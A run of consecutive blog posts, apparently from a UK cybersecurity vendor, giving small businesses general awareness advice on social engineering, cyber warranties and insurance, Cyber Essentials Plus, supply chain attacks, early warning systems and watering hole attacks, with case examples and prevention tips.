October is Cyber Security Awareness month, so we’re focussing on a frequently seen threat, social engineering. During my time as a Detective Sergeant leading the Dorset Police Cyber Crime Team, social engineering attacks became one of the most common offences. So, based on my experiences, let’s look at what they are, how they work, and what you can do to guard against them. 

What is social engineering and why should I care?

Social engineering involves an attacker using various methods to manipulate a person into doing what the attacker wants them to do. Social engineers leverage key principles to successfully achieve their aim. These principles include:

• Authority – This relies on the fact that most people will take instruction from someone who appears to be in charge
• Intimidation – Scaring or bullying an individual
• Consensus – People will often want to do what others are doing
• Scarcity – Making something appear more desirable because it may be the last one
• Familiarity – The recipient likes the individual or organisation the social engineer is claiming to be
• Trust – The Social engineer builds a relationship with the target
• Urgency – Creating the feeling that action must be taken immediately

Each of these principles will trigger an emotional response in the recipient, this is what the attacker relies on. When we react emotionally, we are not thinking clearly.

Social engineering is the cyber criminal’s go-to tool for achieving their aims. This could be stealing data, money or your identity. The final victim of the attack may not even be the person that is socially engineered, the victim could be their employer or even a loved one. 

The impacts of this can be significant, whether it is a big financial loss, reputational damage or even the psychological stress caused. In a worst-case scenario, this could lead to a business closing down or an individual coming to harm.

Want to protect your business but not sure where to start? Check out our free guide to protecting your business on a budget.

How big a problem is social engineering? 

The stats don’t lie! Social engineering is a significant problem.

According to the Cyber Security Breaches Survey 2023, phishing (a form of social engineering) is by far the most common type of cyber attack.  A staggering 79% of businesses and 83% of charities reported being targeted by phishing attacks in the last 12 months. In fact, the problem is so widespread that the average organisation is targeted by over 700 social engineering attacks each year. And some 98% of cyberattacks involve a form of social engineering.

Nor is the problem confined to the well-heeled. Social engineering attacks are 350% more common for employees of small businesses than at larger enterprises.

What are the most common types of Social Engineering?

As discussed previously, there are many types of social engineering. This includes phishing, pretexting, tailgating, baiting, watering hole attacks and many more. Understanding the many forms of social engineering will help you defend against them.

Phishing

The most widely recognised form of social engineering is Phishing. Phishing is most commonly launched via email but can be conducted through SMS (Smishing) or a phone call (Vishing). 

A phishing email will present itself in your inbox and on the surface appear to be a genuine email. However, the email will be from an attacker and may contain malicious attachments or links. These could be used to take some form of control over your computer or to redirect you to a spoof website in which you input your credentials, allowing the attacker to steal them.

Pretexting

Pretexting is another commonly used social engineering technique. In this attack, the social engineer will use a fictional scenario to justify why they are contacting you. Once contact has been made, the social engineer will try to obtain information from you.

For example, the attacker could pose as the IT help desk, calling you to help with a reported issue with your computer, gaining your trust and offering to connect to your computer to quickly resolve the problem remotely. If successful, the attacker could then exploit this access to your computer.

Tailgating

Tailgating is slightly different. These attacks are aimed at physical, rather than digital, entry into your business. Usually,  the social engineer would follow you as you opened and walked through a secure entry, thus allowing them access too.

This scenario is one that we have all faced. You use your keycard to open the office door, as you walk through someone runs up behind you and you feel obliged to hold the door for them. It may be that you see someone approaching the door carrying a heavy box. Although this sounds like something we would never do, our emotions and initial reaction to want to help people who are in a situation that we have all been in prompts us to take action and hold that door open.

Social engineering in the real world: a dating disaster 

Having worked in law enforcement for 15 years, I have investigated hundreds of crimes. 

One case I investigated was the takeover of a business and subsequent fraudulent transactions over 48 hours. This all started with social engineering. 

In this case, a business owner had signed up for a dating website. The business owner began chatting to someone via instant messages on the site, there was nothing unusual about this. The conversation was going well and the pair discussed their likes and dislikes. The conversation moved to star signs and the victim revealed their date and place of birth. Again, this was all within the context of the conversation and appeared quite normal. However, things were not as they seemed.

Romance turns to horror 

Unbeknownst to the victim, the social engineer had struck gold. A quick Google search of the victim’s name revealed his business website, including his mobile phone number.

This information was used to contact his mobile phone provider and port his mobile number to the social engineer’s sim card. The victim’s phone was no longer receiving text messages or calls, as they were being sent to a phone that the social engineer controlled.

But it didn’t stop there, using the victim’s personal details and phone number the social engineer proceeded to take control of the business’s website and email address, ultimately taking out a loan in the business owner’s name. Within 48 hours the victim had lost control of his business and owed the bank thousands of pounds. He only realised something was up when he couldn’t use his phone.

Fortunately, he was able to recover his phone number and some of the money was recovered. However, this took weeks to rectify and the time, stress and effort he put into getting back to square one is not to be overlooked.

How to recognise social engineering attacks

We are all very busy, the digital world is always available to us, whether we are sitting at our desks or in the back of a taxi using our phones. The next meeting or deadline is always within touching distance. Because of this, we may not always have our full attention focused on how we respond to the many interactions we have within our day.

Here are three strategies to be used to help recognise social engineering attacks:

1. Trust Your Instincts

If something feels off or too good to be true, it probably is. Trust your gut feelings when you encounter suspicious requests or situations. 

2. Be wary of your emotions

Social engineers want to trigger an emotional response to encourage you to make a quick decision. Take a step back and consider whether the situation truly requires immediate action.

3. Verify unusual requests

If you receive unusual requests, such as transferring money, providing access to a building, or sharing sensitive data, independently verify the request through a trusted and known communication channel.

How to protect yourself

The threat will always be there and, as we have seen, it can take many forms. Here are three simple measures that can we put in place both at work and in our personal lives to help counteract the threat.

Use MFA

Whenever possible, enable multi-factor authentication (MFA) on your accounts. Even if an attacker obtains your password, they won’t be able to access your accounts without the second factor.

Don’t share too much on social media

Be cautious about sharing personal information on social media platforms. As we saw in the case study, attackers will use information gleaned to craft convincing social engineering attacks.

Education and training

Regular security awareness training for everyone is vital. Proofpoint found that only 56% of organisations with a security awareness program train their entire workforce. We lock all our doors and windows at night, and we should train everybody to ensure common social engineering tactics are recognised and stopped before they can harm us.

Looking to protect your business on a budget without sacrificing security? Read our guide to find out how.

Cyber insurance is one of the fastest-growing industries on the planet. Even relatively conservative estimates predict the industry will be worth close to $85 billion by 2030. However, the cyber insurance industry has had its challenges, most notably rising premiums and a growing threat landscape, leading to other products popping up alongside it.

One such product is cyber warranties. But what is a cyber warranty? And how does it differ from cyber insurance? 

What is a cyber warranty? 

We’ll keep this brief, as you can read a more detailed explanation of what a cyber warranty is here. But, in simple terms, a cyber warranty is a guarantee from a vendor that they will cover customers’ costs in the event of a breach, provided a set of criteria is met.

Typically, cyber warranties come in two forms:

1) A vendor guarantees that their product or service will remain secure against cyber threats. If a breach occurs due to a vulnerability in the vendor’s product, they must cover costs related to investigation, notification and recovery.

For customers, this provides a guarantee that the provider takes security seriously and regularly reviews and patches their software. Meanwhile, for the vendor, it acts as a way to differentiate themselves from competitors and gain customers’ trust.

2) A vendor guarantees against a set of cybersecurity controls or practices. To illustrate, let’s say a vendor decided to do this using the Cyber Essentials controls. Provided the purchaser of the warranty can prove that all five controls were in place at the time of the breach, the vendor would be required to cover the costs associated with recovering from the attack. 

This approach has the advantage of encouraging customers to be proactive in adopting security best practices, as well as offering them protection from threats.

Considering cyber insurance but unsure where to start? Download our guide to cyber insurance for everything you need to know.

How does cyber insurance differ vs. cyber warranties?

After reading this far, you may well be wondering what the difference between warranties and insurance is. After all, both shield organisations from the costs associated with a successful cyber attack. So why does the cybersecurity sector have space for both?

Despite the similarities, once you delve a little deeper, it becomes clear that cyber insurance and cyber warranties have a few key differences:

• Cyber insurance typically offers more comprehensive protection while warranties cover a limited set of risks
• Insurance offers the option of both first and third-party coverage (the claims of someone other than the policyholder). Warranties are limited to first-party incidents only
• Insurance is a financially regulated product whereas warranties fall under consumer protection laws
  
  
• Insurance policies can, in some cases, be customised with optional covers whereas warranties tend to be more standardised
  
  
• Obtaining insurance is often subject to a detailed application process in order for the underwriter to fully assess the risk, warranties often have a far simpler process which requires agreeing to the product or service terms and conditions 

Is the best approach to use both?

Given the differences between them, is the most comprehensive approach to risk management to take out both a cyber warranty and cyber insurance?

In short, yes. But let’s dig a little further into why. 

Cyber warranties have several perfect use cases, for example: 

• You’ve just purchased a cybersecurity tool or software and the vendor offers a warranty alongside it
• You want to cover a limited set of cyber risks that are either tied to a specific product or set of controls
• You’re considering cyber insurance but want some protection in the meantime. In this case, the second type of warranty mentioned above is perfectly suited

However, cyber warranties’ use cases aren’t endless. And, this is where cyber insurance steps in. For comprehensive cover, customisation and a wider range of recovery services attached, cyber insurance is the best bet. 

But that’s not to say the two don’t work well in concert. Here are just a few examples of scenarios where it’s beneficial to use both: 

• You want to cover against a specific set of cyber risks (for example those associated with a product) but still want general protection
• You’re using warrantied software or products but need a higher coverage limit than the warranty allows for
• You want to use a warranty to cover you against some basic risks and insurance for the more complex ones

These are just a few examples of how warranties and insurance can work well together, we could list plenty more. In fact, it’s plausible some combination of the two could become the norm for most businesses in the next few years.

Forward-thinking insurance providers are beginning to offer bundled cyber insurance and warranty solutions tailored to SMBs. With the number of threats to small businesses only growing, it’s increasingly likely this will become the standard in cyber risk transfer as the decade progresses.

Confused about cyber insurance? Check out our guide for everything you need to know.

Are you considering Cyber Essentials Plus, but unsure whether it’s right for your business? To help you decide, we’ve pulled together a quick summary of how the government-backed certification works, and why it could be the next step for your business. Read on to find out more.

What is Cyber Essentials Plus?

Cyber Essentials Plus follows the same simple approach and offers the same benefits as Cyber Essentials. However, it differs in one key aspect; Cyber Essentials Plus includes a technical audit of your system. The controls are the same, the audit just ensures they’re in place and properly configured.  

The audit process takes a little more effort than the standard certification, but it’s worth it for the peace of mind that your security is up to standard.

When should you consider Cyber Essentials Plus?

The truth is, any business looking to improve its security could benefit from Cyber Essentials Plus. However, there are a few scenarios in which we’d recommend Cyber Essentials Plus.

Confused about certification? Read our free guide for everything you need to know.

1. You want a thorough assessment of your cybersecurity credentials 

Cyber Essentials is a great first step for any small business that wants to up its cybersecurity game. Nevertheless, the standard Cyber Essentials certification is self-assessed. This means that while you’ll have to comply with the security controls it lays out to pass, you won’t benefit from an independent assessment.

Cyber Essentials Plus, on the other hand, features a visit (either in person or remotely) from an independent auditor. So you’ll gain the peace of mind that your security credentials are up to scratch.

2. You want to work with high-value customers 

It’s a general rule of thumb that the more prestigious the clients you work with, the more stringent their security requirements. Cyber Essentials Plus can help demonstrate to potential customers with high expectations that you take data protection and cybersecurity seriously. And, it could help you steal a march on competitors.

3. You’re a public-facing business 

Any business that directly interacts with the public should make cybersecurity a top priority. If your business stores personal data, whether that’s contact details or financial information, it’s part of your duty of care to protect it.

Investing in Cyber Essentials Plus will not only help you put in place the measures needed to better protect your organisation, but it also demonstrates to customers that you take security – and their personal data – seriously. 

4. You work in a sector that requires higher-than-standard security

Some industries are more at risk from cyberattacks than others. For example, manufacturing firms were the victims in almost a quarter (24.9%) of all breaches globally in 2022, closely followed by finance and insurance with nearly a fifth (18.9%).

If your business works in a high-risk sector, it’s natural that you need better protection. Again, the standard certification is a great stepping stone, but the extra assessment and validation provided by Cyber Essentials Plus is key if you’re more likely to be targeted. 

What’s more, many businesses working in high-risk industries will require partners and suppliers to demonstrate better-than-basic credentials and Cyber Essentials Plus fulfils this function.

5. You want to access government funding or bid for tenders

Although Cyber Essentials Plus isn’t mandatory for all government funding and contracts yet, there are plenty of scenarios where you’ll need it. For instance, schools and colleges hoping to secure ESFA Education and Skills contracts are required to have passed Cyber Essentials and be working towards Cyber Essentials Plus.

Likewise, many healthcare and defence tenders mandate that applicants have, at least, the standard certification in place, if not Cyber Essentials Plus. There’s even a case to be made for investing in Cyber Essentials Plus even if the contract doesn’t require it. In a competitive tendering process, being able to demonstrate you have better security bona fides than your rivals could help tip the balance in your favour. 

Still unsure about which cybersecurity certification is right for your business? Check out our guide to UK certifications for everything you need to know. 

Managing and monitoring cybersecurity across an entire supply chain is a challenging task. This is especially true if you’re an SME. However, knowledge and prevention strategies can greatly reduce the risk of a successful supply-chain attack. And, this can be extended to the suppliers and third parties in your supply chain.

Ultimately, the best way to improve your cybersecurity is to create a cohesive, collaborative environment that helps drive continuous security improvement internally and across your supply chain. We’ll explore how to do exactly that in this blog.

Why worry about supply chain attacks?

Supply chain attacks are nothing new but, now more than ever, businesses are accelerating their efforts to prevent them. The National Cyber Security Centre (NCSC) issued new guidance following the recent rise in supply chain attacks, revealing that only one in ten businesses review the risks posed by their immediate suppliers. Similarly, 44% of organisations say they will substantially increase their year-over-year spending on supply chain cybersecurity in the coming year. 

So there’s never been a better time to work with your suppliers to identify risks and ensure appropriate security measures are in place. To help you out, here are five simple steps.

5 steps to encourage continuous security improvement for supply chains

1. Understand the basics of cybersecurity

Begin by looking at your organisation. In today’s digital world, the bare minimum of cybersecurity isn’t enough. SMEs are often limited by knowledge and budget, but luckily, there are many accessible solutions to help improve your cybersecurity credentials. Government-backed schemes like Cyber Essentials require you to meet specific cybersecurity standards. By achieving accreditation, you’ll ensure you’re covering the basics. And, with this knowledge, you’re better prepared to assess your supply chain. 

Want to know more about the risks posed by supply chains? Read our guide. 

2. Conduct a risk assessment 

Your supply chain might be extensive with many moving parts and people. Equally, it could be very small. No matter the size, take the time to conduct a thorough cybersecurity risk assessment of your supply chain. This might be asking suppliers whether they have cybersecurity accreditations, such as a Cyber Essentials certification, that help them stay secure and compliant. 

Look for specific risk factors in your supply chain. For example, payment processing software might be more susceptible to skimming attacks. Does your provider have cybersecurity measures to mitigate against this?  It’s happened to even established and seemingly secure businesses, so it could happen to your providers. 

3. Define contractual agreements

If you want to ensure everyone you work with takes cybersecurity seriously, the simplest step is to write cybersecurity requirements into your contracts with third parties and suppliers. This will allow you to define your expectations for
cybersecurity and procedures for communicating and reporting incidents – making everybody safer in the process. 

4. Encourage cybersecurity training

Certifications and contractual agreements can’t totally override human error. You already know your employees should receive cybersecurity training, but do your supply chain contacts also offer it to their employees? Consider making your partners aware of platforms to enhance employees’ cybersecurity training. While this is ultimately your suppliers’ responsibility, open communication about what’s available is beneficial and shows you prioritise cybersecurity.

5. Collaborate and share intelligence

Staying up to date with the latest cybersecurity news is a great method of staying aware of potential risks. Not all SMEs will have dedicated cybersecurity professionals to hand, so following news sources or trusted cybersecurity blogs can help you keep your knowledge up to date. 

It’s wise to share your findings with partners in your supply chain. This might be through a monthly email chain, communication channel like Microsoft Teams, or within your regular meetings. Open communication is key to improving collaboration with your supply chain and demonstrates a desire for a unified effort towards increased cybersecurity. 

Conclusion

The importance of supply chain cybersecurity can’t be understated in today’s landscape. Ian McCormack, Deputy Director for Government Cyber Resilience at the National Cyber Security Centre emphasises this in a recent statement;

“Supply chain attacks are a major cyber threat facing organisations and incidents can have a profound, long-lasting impact on businesses and customers. With incidents on the rise, it is vital organisations work with their suppliers to identify supply chain risks and ensure appropriate security measures are in place.”

Luckily, the road to improved and continuous supply chain security isn’t complex. By taking simple measures, such as a cybersecurity certification and collaborating closely with suppliers, your business will become more secure.

If a thief wants to enter a house, it’s unlikely they’ll choose to ring the doorbell. They’re going to climb through a half-opened window around the back. And if they’re careful enough, the homeowner is none the wiser.

The same principle applies in the cybersecurity landscape. Supply chain attacks have existed for some time, and are an infamous method of finding cybersecurity vulnerabilities to target seemingly secure businesses. Gartner predicts that by 2025, 45% of organisations globally will experience an attack on their software supply chain. Here’s how they work and what you need to know about them.

What is a supply chain attack?

A supply chain attack is when a cyber criminal exploits a vulnerability in a supply chain. Many businesses today are cybersecurity-savvy. The best prepared will have well-intentioned cybersecurity policies and regulations in place to manage their cybersecurity and keep problems at bay. 

But most businesses don’t operate within silos. Your organisation probably relies on other businesses as part of your supply chain, or you form a part of another supply chain. This creates complexity when managing security credentials. Can you be assured that every business within your supply chain, from a payment processing provider to a manufacturer, is completely secure? 

Most organisations will manage compliance across their people, software, and processes, but this is difficult to extend to other points in the supply chain. This is the exact vulnerability criminals can exploit. 

Want to know more about the risks posed by supply chains? Check out our guide.

Examples of supply chain attacks

1. SolarWinds

No supply chain attack discussion can ignore the SolarWinds supply chain attack. SolarWinds is a major software company that specialises in network and infrastructure monitoring tools. In 2019, threat actors gained unauthorised access to SolarWind’s networks, and in the following months injected malicious code into their software, Orion. Later in 2020, SolarWinds unknowingly sent out hacked code via software updates – installing malicious code onto customer devices that could be used to spy. This infected many significant organisations, from small businesses to government bodies. 

2. Target 

Known as one of the earlier supply chain attacks, Target, a U.S. superstore retailer, was impacted in 2013. Cybercriminals exploited vulnerabilities in the retailer’s point of sale (POS) systems to retrieve 40 million customer credit and debit card information. The cost of this data breach has since cost the business nearly $300 million. 

3. British Airways

In 2018, British Airways was unknowingly impacted by a code that harvested customer payment data using their website payment page. The code routed credit card information to an external domain. This is known as skimming, when payment data is unknowingly collected during the online purchase checkout process. Magecart is suspected to be responsible for this skimming attack, and approximately 380,000 customers had their personal and financial data stolen. 

SMEs and supply chain attacks

Cybercriminals target large organisations due to the sheer volume of data they can exploit. But small and medium businesses are equally susceptible targets.

More than half (54%) of all U.K.-based SMEs experienced some form of cyber attack in 2022. Cybercriminals know that SMEs are more vulnerable as they might not have rigorous security credentials. Additionally, SMEs are often part of a larger supply chain, making them a great target. 

How to protect your SME from supply chain attacks

Manage your cybersecurity first

Consider your cybersecurity status first. A basic cybersecurity certification, such as Cyber Essentials, will cover everything your business should do to protect itself from cyberattacks. Being certified can reduce cyber risk by up to 98.5%, and can help you with important steps like staff training and long-term cybersecurity support. 

Check your suppliers

Request that your suppliers show evidence of cybersecurity management. A certification can be all they need to remain secure. More high-risk suppliers should have equally risk-resilient cybersecurity measures in place. If they don’t, this should raise your alarm bells.

You should collaborate with every business in your supply chain, and the supply chains you are within, to emphasise the importance of cybersecurity credentials. You can even make cybersecurity part of your contractual agreements, so there’s less chance of a vulnerability in your supply chain.

Implement an early warning system

A supply chain early warning system (EWS) can identify security threats in a supply chain using data. It analyses data and notifies the system administrator to suggest methods of mitigating the threat. An EWS reduces your reliance on human knowledge alone, and instead can autonomously detect threats. As types of attacks become increasingly more complex, this is a great method of covering all bases if it’s an attack you might not have encountered before. 

A supply chain attack could happen to you

But it doesn’t have to be that way. By ensuring your organisation is as secure as possible, and obligating your suppliers to do the same, you’re more likely to deter and mitigate the risk of a supply chain attack against your SME. This way, your business’s figurative back windows are firmly locked, so no burglars can get in – through the front door or the back.

It’s not an exaggeration to say that supply chains pose one of the greatest cybersecurity risks to any business. In recent years, there’s been a huge increase in attacks stemming from supply-chain vulnerabilities. According to IBM’s 2023 X-Force Threat Intelligence Index, more than half of security breaches are attributed to supply chain and third-party suppliers, at a high average cost of over $4 million. 

It’s a serious problem. And, like most small businesses, you’re probably asking what you can do about it. After all, looking after your own cybersecurity is tricky enough; how on earth do you start addressing gaps in your suppliers’ defences? 

To help you get started, we’ve put together 5 supply chain security best practices to strengthen your digital defences.

1. Protect your own business first 

This almost goes without saying, but before you delve into your supply chain, it’s worth considering your own cybersecurity status first. Is your business Cyber Essentials certified? Do you have security controls in place? Do you provide regular training for staff on cyber threats and best practices?

If you’ve answered no to any of the above, then these are great first steps in securing your business. And there’s a bonus to taking these measures first. By reviewing your own security, you’ll get a good idea of your business’s crown jewels – those critical aspects of your organisation that need the strongest protection.

2. Talk to your suppliers 

Progress begins with dialogue. So talk to your suppliers and partners about their cybersecurity. You may find that your business faces many of the same difficulties and threats. 

This can help you work together to ensure everyone in your supply chain works to the same security standards. And keeping dialogue open makes it much more likely that suppliers and partners will let you know faster if something goes wrong – protecting your business in the long run.

3. Make cybersecurity part of your contractual agreements 

Behavioural change often requires incentives. Once you’ve established what good cybersecurity looks like for your business, apply those principles to your partner and supplier contracts. 

How these agreements look will depend on your organisation. Requiring your partners to have a complete Cyber Essentials certification will be enough for some businesses. Others may need something more comprehensive, like ISO 27001 certification. 

The important thing is that you make good cyber hygiene an expectation (rather than a nice to have) for anyone working with your business. By doing so, you not only incentivise good cybersecurity behaviours across your supply chain but also protect your business. 

4. Keep improving

Building a strong cybersecurity culture across your network takes time. It requires trust between businesses, and you can’t build that overnight. So persevere if your supply chain doesn’t immediately transform from leaky to locked down.

 Cybersecurity is all about learning. As cyber threats evolve, so too do the methods for thwarting them. Stay updated with new threats and tweak and adapt your practices accordingly. You can then use this knowledge to update partners and suppliers and strengthen your supply chain.

5. Follow the NCSC’s new guidance 

Finally, if you’re looking for a framework to tie everything together, you could do a lot worse than the National Cyber Security Centre’s (NCSC) supply chain cybersecurity guidance.

The NCSC’s guidance breaks tackling supply chain security down into five basic steps ( in case you were wondering where we got the idea from):

1. Understand why your organisation should care about supply chain cybersecurity
2. Develop an approach to assess supply chain cybersecurity
3. Apply the approach to new supplier relationships
4. Integrate the approach into existing supplier contracts
5. Continuously improve

It’s a great place to start if you’re serious about tackling cybersecurity across your supply chain.

It’s a journey, not a destination

And remember, securing your supply chain is an ongoing process, but starting now is one of the biggest single investments you can make in protecting your business. Want to know more? Check out our new guide to protecting your business.

You’re a hacker ready to launch an attack. What do you target? 

• A: A single person or company that’ll get you a sizeable reward, if the attack is successful?
• B: A supply chain that could get you access to hundreds, if not thousands, of companies and their data, if the attack is successful?

Supply chain attacks increased 633%, by 88,000 instances, in 2022. And it’s easy to see why.

With this increased risk, it’s good to understand what supply chain hacks are, why they happen, and how to protect your business from them as much as possible. 

What are supply chain hacks?

A supply chain hack is a type of cyberattack that targets organisations by exploiting weak links in third-party software, hardware, or services. In these cases, you could have very strong cybersecurity defences but suffer an attack because a supplier’s software has a vulnerability they weren’t aware of. Hackers use this to access your networks and data undetected and cause damage. 

Because these attacks are through legitimate supplier software/hardware, they can be more difficult to spot and stop. In the high-profile SolarWinds attack, it took months for professionals to understand how cyber criminals were gaining unauthorised access to networks and data.  

Why hackers attack supply chains

1. Collateral damage

By accessing a company that provides software or services to other companies, hackers can harm multiple targets in one hit. Instead of putting effort into attacking one company, they could potentially impact hundreds, if not thousands. Take the recent Otka attack as an example. Otka has 14,000 customers, and in one five-day attack, hackers impacted 366 of them. 

This kind of attack doesn’t just cause immediate damage like data loss. It also causes long-term reputational challenges for suppliers. As supply chains rely on trust, customers lose confidence in their suppliers’ abilities to protect themselves, and therefore their customers, from cyber threats. 

2. Kudos 

Hacking is a skill – albeit a dangerous one in the wrong hands. And hackers have egos. If one can successfully infiltrate supply chains, access customer data, install malware, etc., on a large scale and cause widespread damage, they can brag about it. The bigger the attack, the better. 

3. Financial gain

A supply chain is a perfect place for a hacker to compromise cash flow and payment systems between multiple companies to gain access to sensitive financial information. They can divert payments, demand ransom, and leak/sell sensitive data on a large scale. The more money they can make, the more worthwhile the hack is.

4. Disruption and theft

As is the case with other types of cyberattacks, supply chain hacks cause a lot of disruption. Because so much data is available for exploitation in supply chains, cybercriminals attack them to get hold of vast amounts of personal data, intellectual property, and confidential business information. This…

• severely disrupts and even stops operations
• causes financial losses
• damages trust
• injures brand reputation

Safeguard your business against supply chain hacks

Few companies take steps to formally review risks in their supply chains – around one in ten businesses review the risks posed by their immediate (13%) and wider suppliers (7%). 

You need to work with suppliers and feel confident that they work to the same high standards as you. Supply chain attacks pose a very real threat, but don’t let it get to you. 

There are some simple and affordable ways to give yourself (and make sure your suppliers have) a good amount of protection against threats. 

One way is to get a Cyber Essentials certification. This is a government-backed scheme to help businesses protect themselves in five core areas:

• Secure configuration
• Malware protection
• Network firewalls
• User access controls
• Security update management

Applying the five principles to how you work can reduce your cyber risk by 98.5% and give you the confidence and understanding you need to speak to your suppliers about their security practices.

Want to know more about the threat posed by supply chain attacks and learn how to protect your business? Check out our new guide for everything you need to know.

89% of businesses have experienced a supply chain risk event in the past five years. Discover how a supply chain early warning system can help you reduce risk and stay one step ahead.

What is a supply chain early warning system?

A supply chain early warning system (EWS) identifies potential security threats in your supply chain, based on a combination of internal and external data. After analysing the data, the system notifies decision-makers and suggests measures to mitigate the threat or minimise the impact. Together with your cybersecurity tools, processes, and policies, it helps to protect your business against third-party threats.

In the past, supply chain early warning systems focussed on far-reaching external factors that could disrupt business operations. For example, natural disasters, critical component shortages, or industrial action. But, due to the growing threat of supply chain attacks, today’s systems play a crucial role in protecting businesses against cybercriminals.

Supply chain attacks increased by 633% in 2022.

– Sonatype, Stats of the Software Supply Chain

5 supply chain cybersecurity risks an early warning system detects

Supply chain attacks surpassed traditional malware-based exploits by more than 40% in 2022, according to the Identity Theft Resource Center’s annual Data Breach Report. In the past twelve months, supply chain attacks impacted over 10 million people representing 1,734 entities.

What makes them so difficult to detect, let alone stop, is the diverse array of delivery methods. Of the numerous supply chain risks to be aware of, these are among the most common.

Worried about the threat posed by supply chain attacks? Read our guide to protecting your business.

1. Watering hole attacks

The hacker inserts malicious software into a website that receives a lot of traffic from the target business or businesses. When someone visits the compromised site, the malware infiltrates the visitor’s defences to gain access to their systems or data. Watering hole attacks are difficult to detect and boast a higher-than-average success rate.

2. Compromised software development tools

The hacker compromises a supplier’s software development tools, infrastructure, or processes. This leaves any resulting applications built from them vulnerable to zero-day security exploits, putting end-users at risk.

3. Compromised website builders

The hacker compromises a supplier’s website via its website builder. Typically, the hacker installs malicious software or a redirect script into the target site, which sends users to a malicious clone of the website when they visit the URL.

4. Stolen product certificates

The hacker steals an official product certificate, which enables them to distribute malicious software and applications under the guise of legitimate products. 

5. Third-party data store breaches

The hacker infiltrates a third-party data centre, for example, via a botnet. Once inside, they can steal sensitive business or customer information which they can then:

• Sell for profit on the dark web
• Ransom back to the victim
• Release to the public
• Delete or corrupt

How do early warning systems protect you against supply chain threats?

Detect and respond to network vulnerabilities

Most businesses only realise a hacker has compromised their network when they spot suspicious activity. For example, when a network client scans the internet. But at this point, the damage may already be done. An early warning system proactively monitors your network for vulnerabilities and malware, giving you time to repair any breaches before hackers can exploit them.  

Identify and assess cyber risks

An effective supply chain early warning system raises your awareness of external cybersecurity threats that may impact your business. When your system identifies a potentially harmful event or attacker, it notifies relevant stakeholders. This helps you:

• Quickly spot and assess risks
• Proactively monitor emerging threats or incidents
• Prepare your defences to minimise or mitigate the impact on your business

Raise stakeholder awareness

By keeping stakeholders informed of current and emerging threats, early warning systems help to raise awareness of your supply chain risks. Over time, you’ll understand what to look out for and where to invest your cybersecurity budget to protect against online threats. 

Forewarned is forearmed

A supply chain early warning system adds another layer of defence to your cybersecurity. It gives you a clear view of your risk landscape, so you can detect and respond to online threats more effectively.

However, you don’t necessarily need a specialist tool to dramatically improve your supply chain security. Cyber Essentials certification can help you get the basics in place. Meanwhile, a generalist security tool like CyberSmart Active Protect can give you early warning of vulnerabilities within your own organisation, mitigating many of the risks your business faces. Likewise, following the NCSC’s guidance on mapping your supply chain can also help better protect your organisation.

You can’t always control the security of your suppliers or partners, but by getting the fundamentals down, you can minimise your risk.

In 2018, the Cambodian Ministry of Defence and several Vietnamese news outlets fell victim to a sophisticated cyberattack targeting multiple high-profile websites across Southeast Asia.

The attack went undetected for months, during which time anyone who visited the compromised sites was redirected to a page controlled by the hackers. From there, the hackers were free to distribute malware to the unfortunate victims. The notorious OceanLotus threat group claimed responsibility.

Known as a watering hole attack, OceanLotus was by no means the first group to target places people visit rather than the individuals themselves. In this article, we explain what a watering hole attack is, how they work, and how you can protect your business against them.

What is a watering hole attack?

Watering hole attacks are a type of third-party or supply chain attack. The hacker aims to install malicious software on the victim’s computer or gain access to their network by compromising websites they visit frequently. The consequences can be severe, ranging from theft of sensitive customer information to making the victim’s computer part of a botnet.

The name “watering hole attack” derives from nature. Over the aeons, lions and other predators have adapted their hunting strategies to conserve energy. Instead of chasing prey across the scorching African savanna, they simply wait for the zebra or gazelle to visit a watering hole and pounce while it’s busy drinking. 

Cybercriminals typically use watering hole attacks to target large, well-protected organisations. Either by compromising an employee’s computer or a partner business further up the supply chain. 

Watering hole attacks are difficult to detect because they harness the implicit trust people place in well-known organisations and institutions. And, because many successful attacks target exploits in browsers or systems, they have a high success rate. 

Worried about the threat posed by supply chain attacks. Check out our guide to protecting your business.

How do watering hole attacks work?

The average watering hole attack unfolds over three stages. 

1. Reconnaissance

The hacker gathers intelligence about the target’s browsing habits. This can include a mix of publicly available information and illegally obtained private data. They can then use this information to create a shortlist of suitable sites to host the attack. Usually, these are sites with lower-than-average security.

2. Planning

Once the hacker identifies the most suitable hosting domains, it’s time to decide how to launch the attack. The two most common options are to:

1. Probe the shortlisted hosting domains for any potential weaknesses the criminals can exploit to compromise the legitimate website.
2. Create a spoofed version or clone of a shortlisted hosting site that contains malware.

Some cybercriminals may combine the two approaches to increase their odds of success. In this scenario, the hacker compromises a legitimate website and inserts a redirect code that sends victims to the fake site where the payload is delivered.

3. Design and execution

The hacker exploits any weaknesses to insert malicious code into the watering hole site or cloned website. Typically, this involves manipulating web technologies like HTML and JavaScript or using exploit kits that target specific IP addresses. When someone visits the compromised domain, their browser automatically downloads the malicious software. 

In the case of drive-by attacks, the hacker capitalises on the implicit trust users have in well-known websites by hiding malware in download buttons or links. When the victim clicks on the link, they inadvertently download the malicious software – often without even realising it. 

Remote access trojans (RATs) are a popular choice of malware among cybercriminals, as this grants access to the victim’s computer or systems.

*Image: Supply chain security guidance, National Cybersecurity Centre

How to prevent watering hole attacks

The first step is to familiarise yourself with cybersecurity best practices. Simple measures, like installing reliable antivirus software and upgrading your browser protection, can significantly reduce your cyber risk.

We recommend adopting these four measures, as a minimum.

Stay on top of system updates

Many cyberattacks work by exploiting unpatched vulnerabilities in operating systems, browsers, and software. And watering hole attacks are no different. By installing the latest security updates as soon as they become available, you can plug these gaps before cybercriminals have a chance to use them.

Regularly review and test your security

Many cybercriminals bank on the fact that most people think their antivirus software tackles threats for them. We recommend that you review your security tools, processes, and policies at least once a year to ensure you’re protected against the latest threats.

Educate and train your staff

The cybersecurity landscape is dynamic. Cybercriminals are constantly evolving their tactics and new threats emerge all the time. Then, there’s the human factor. According to Stanford University research, human error causes 85% of data breaches. Run regular training workshops to teach staff to identify suspicious activity, spot potential threats, and respond to cyber-attacks.

Get Cyber Essentials certified

Cyber Essentials is a government-backed scheme that provides a simple framework to help businesses protect against cyber-attacks. It’s separated into five technical controls:

• Secure configuration
• Malware protection
• Network firewalls
• User access controls
• Security update management

Cyber Essentials is a more affordable option than advanced certifications, like ISO 27001. It’s also faster and less intensive, so it’s a good place to start. With the right guidance and support, you can become certified in just three days. This makes it the perfect solution for SMEs.

For more advanced recommendations, read the National Cybersecurity Centre’s (NCSC) 12 principles of supply chain security.

It’s a jungle out there

Watering hole attacks are no longer a niche threat. Forbes named them as one of the top ten cybersecurity threats of 2022, reflecting the increase in supply chain attacks in recent years. 

